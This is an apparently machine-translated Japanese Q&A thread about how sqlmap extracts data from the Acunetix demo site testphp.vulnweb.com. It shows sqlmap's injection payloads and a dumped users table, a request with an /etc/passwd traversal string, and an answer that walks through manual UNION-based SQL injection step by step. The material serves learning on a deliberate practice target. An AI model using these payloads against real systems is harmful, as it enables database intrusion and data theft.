web-dev-qa-db-ja.com

sqlmapがすべてのデータベース情報を取得する方法

Sqlmapがデータベースからすべての情報を取得できる方法に興味がありますか? burpをプロキシとして使用して、すべての要求と応答を表示しています。応答から、データベースに関連する情報を確認できませんでしたが、sqlmapは関連情報を表示できました。たとえば、sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --proxy = "http:// 192.168.0.115:8181 "、テーブルユーザーのacuart dbからレコードを取得できます。

これはsqlmapの出力です

[*] starting at 17:55:43

[17:55:43] [INFO] resuming back-end DBMS 'mysql' 
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7494=7494

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(Rand(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart | pass | uname | phone   | email           | address   |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0    | test | test  | 2323345 | [email protected] | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+

[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 17:55:49

プロキシからのリクエスト:

GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store

プロキシからの応答:

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
  <div id="globalNav"> 
        <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
    <td align="left">
        <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
        </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
        <a href="guestbook.php">guestbook</a> | 
        <a href="AJAX/index.php">AJAX Demo</a>
    </td>
    <td align="right">
        </td>
    </tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
    <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <input name="searchFor" type="text" size="10"> 
      <input name="goButton" type="submit" value="go"> 
    </form> 
  </div> 
  <div id="sectionLinks"> 
    <ul> 
      <li><a href="categories.php">Browse categories</a></li> 
      <li><a href="artists.php">Browse artists</a></li> 
      <li><a href="cart.php">Your cart</a></li> 
      <li><a href="login.php">Signup</a></li>
      <li><a href="userinfo.php">Your profile</a></li>
      <li><a href="guestbook.php">Our guestbook</a></li>
        <li><a href="AJAX/index.php">AJAX Demo</a></li>
      </li> 
    </ul> 
  </div> 
  <div class="relatedLinks"> 
    <h3>Links</h3> 
    <ul> 
      <li><a href="http://www.acunetix.com">Security art</a></li> 
      <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
        <param name="movie" value="Flash/add.swf">
        <param name=quality value=high>
        <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
      </object>
    </p>
  </div> 
</div> 

<!--end navbar --> 
<div id="siteInfo">  <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> | &copy;2006
  Acunetix Ltd 
</div> 
<br> 
</div>
</body>
<!-- InstanceEnd --></html>

あなたの説明は大歓迎です。ありがとうございました。

sql-injectiondatabasessqlmap
1
overshadow

投稿したリクエストに問題があるようです。脆弱なパラメーターは「cat」パラメーターであるため、リクエストの「&」はペイロードを脆弱なパラメーターから分離し、結果として情報が公開されることはありません。

正しく実行しましょう:

のリクエスト:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--% 20-

列の数が元のクエリの数と異なることを示すエラーメッセージが表示されます。

エラー:使用されたSELECTステートメントの列数が異なります

メッセージが消えるまで列の数を増やして(カンマ区切りの番号を追加)、列の数を11にする必要があると判断します。

これは、次のリクエストが有効なページになるためです。

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8、 9,10,11%20from%20information_schema.tables-%20-

多くのアイテムがページに追加されたことがわかります。 7、2、および9の数字は、各アイテムで簡単に確認できます。それらの1つを受け取りたい情報(information_schema.tablesのtable_name)に置き換えると、探していた情報が得られます。

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8、 9,10,11%20from%20information_schema.tables-%20-

(usersテーブルは最後のアイテムにあります)

同じスポットを使用して、探している他のすべての情報を抽出できます。受け取りたい列とデータのあるテーブルを変更するだけです。

3
Denis

このスレッドはかなり古いですが、sqlmapの動作を知りたい人は、sqlmapコマンドの実行中に-v6(冗長レベル6)を使用してください。

1
user2593869